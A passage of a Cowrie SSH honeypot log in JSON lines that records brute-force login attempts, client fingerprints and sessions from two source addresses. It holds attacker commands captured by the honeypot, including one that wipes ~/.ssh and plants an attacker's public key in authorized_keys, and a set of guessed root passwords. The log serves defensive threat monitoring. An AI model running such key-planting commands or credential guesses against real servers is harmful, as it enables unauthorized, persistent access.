","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:07:38.156789Z","src_ip":"212.227.235.229","session":"73537815174d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:38.393795Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.login.success","username":"root","password":"wW123456","message":"login attempt [root/wW123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:39.442997Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55026,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2e3e25ef353","protocol":"ssh","message":"New connection: 212.227.235.229:55026 (1.2.3.4:22) [session: e2e3e25ef353]","sensor":"my-vps","timestamp":"2025-08-31T05:07:39.725703Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:39.973704Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:39.974406Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:39.975581Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:40.196387Z","src_ip":"212.227.125.160","session":"1b4d3b120259"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:40.227890Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:40.794377Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:07:40.795069Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:07:41.050585Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:41.051506Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55986,"dst_ip":"1.2.3.4","dst_port":22,"session":"64ceaae2d308","protocol":"ssh","message":"New connection: 212.227.235.229:55986 (1.2.3.4:22) [session: 64ceaae2d308]","sensor":"my-vps","timestamp":"2025-08-31T05:07:41.300209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:41.301020Z","src_ip":"212.227.235.229","session":"64ceaae2d308"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:41.556616Z","src_ip":"212.227.235.229","session":"64ceaae2d308"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:42.098321Z","src_ip":"212.227.235.229","session":"e2e3e25ef353"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:07:42.103728Z","src_ip":"212.227.235.229","session":"e2e3e25ef353"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:42.628116Z","src_ip":"212.227.235.229","session":"64ceaae2d308"}
{"eventid":"cowrie.login.failed","username":"server","password":"12345678","message":"login attempt [server/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:43.760466Z","src_ip":"212.227.235.229","session":"73537815174d"}
{"eventid":"cowrie.session.closed","duration":"28.5","message":"Connection lost after 28.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:43.869753Z","src_ip":"212.227.125.160","session":"1b4d3b120259"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:43.889484Z","src_ip":"212.227.235.229","session":"64ceaae2d308"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55992,"dst_ip":"1.2.3.4","dst_port":22,"session":"a592677a1d1f","protocol":"ssh","message":"New connection: 212.227.235.229:55992 (1.2.3.4:22) [session: a592677a1d1f]","sensor":"my-vps","timestamp":"2025-08-31T05:07:44.165675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:44.166715Z","src_ip":"212.227.235.229","session":"a592677a1d1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:44.435507Z","src_ip":"212.227.235.229","session":"a592677a1d1f"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:45.894561Z","src_ip":"212.227.235.229","session":"73537815174d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:46.319766Z","src_ip":"212.227.235.229","session":"a592677a1d1f"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:46.589908Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:46.590847Z","src_ip":"212.227.235.229","session":"a592677a1d1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48602,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c4ecea3424c","protocol":"telnet","message":"New connection: 212.227.235.229:48602 (1.2.3.4:23) [session: 7c4ecea3424c]","sensor":"my-vps","timestamp":"2025-08-31T05:07:47.888277Z"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:55.695688Z","src_ip":"212.227.235.229","session":"e2e3e25ef353"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51228,"dst_ip":"1.2.3.4","dst_port":22,"session":"948a4c237a06","protocol":"ssh","message":"New connection: 212.227.125.160:51228 (1.2.3.4:22) [session: 948a4c237a06]","sensor":"my-vps","timestamp":"2025-08-31T05:07:57.178715Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49534,"dst_ip":"1.2.3.4","dst_port":22,"session":"22a187249051","protocol":"ssh","message":"New connection: 212.227.125.160:49534 (1.2.3.4:22) [session: 22a187249051]","sensor":"my-vps","timestamp":"2025-08-31T05:07:58.124864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:58.611749Z","src_ip":"212.227.125.160","session":"22a187249051"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:07:58.612469Z","src_ip":"212.227.125.160","session":"22a187249051"}
{"eventid":"cowrie.login.failed","username":"server","password":"12345678","message":"login attempt [server/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:00.698435Z","src_ip":"212.227.125.160","session":"22a187249051"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:02.286092Z","src_ip":"212.227.125.160","session":"22a187249051"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48780,"dst_ip":"1.2.3.4","dst_port":22,"session":"43c0f2dcb99a","protocol":"ssh","message":"New connection: 212.227.235.229:48780 (1.2.3.4:22) [session: 43c0f2dcb99a]","sensor":"my-vps","timestamp":"2025-08-31T05:08:03.042989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:08:03.044316Z","src_ip":"212.227.235.229","session":"43c0f2dcb99a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:08:03.316686Z","src_ip":"212.227.235.229","session":"43c0f2dcb99a"}
{"eventid":"cowrie.login.failed","username":"ajarami","password":"123456","message":"login attempt [ajarami/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:04.445274Z","src_ip":"212.227.235.229","session":"43c0f2dcb99a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:05.719171Z","src_ip":"212.227.235.229","session":"43c0f2dcb99a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36746,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9b64886bc0","protocol":"ssh","message":"New connection: 212.227.235.229:36746 (1.2.3.4:22) [session: ba9b64886bc0]","sensor":"my-vps","timestamp":"2025-08-31T05:08:08.647489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:08:08.648478Z","src_ip":"212.227.235.229","session":"ba9b64886bc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:08:08.921870Z","src_ip":"212.227.235.229","session":"ba9b64886bc0"}
{"eventid":"cowrie.login.failed","username":"kamil","password":"kamil123","message":"login attempt [kamil/kamil123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:10.826108Z","src_ip":"212.227.235.229","session":"ba9b64886bc0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:12.102343Z","src_ip":"212.227.235.229","session":"ba9b64886bc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48822,"dst_ip":"1.2.3.4","dst_port":22,"session":"50712763684c","protocol":"ssh","message":"New connection: 212.227.235.229:48822 (1.2.3.4:22) [session: 50712763684c]","sensor":"my-vps","timestamp":"2025-08-31T05:08:14.395565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:08:14.396595Z","src_ip":"212.227.235.229","session":"50712763684c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:08:14.478583Z","src_ip":"212.227.235.229","session":"50712763684c"}
{"eventid":"cowrie.session.closed","duration":"34.8","message":"Connection lost after 34.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:14.570899Z","src_ip":"212.227.235.229","session":"e2e3e25ef353"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev12#$","message":"login attempt [dev/dev12#$] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:14.846102Z","src_ip":"212.227.235.229","session":"50712763684c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:15.930809Z","src_ip":"212.227.235.229","session":"50712763684c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:08:16.440239Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
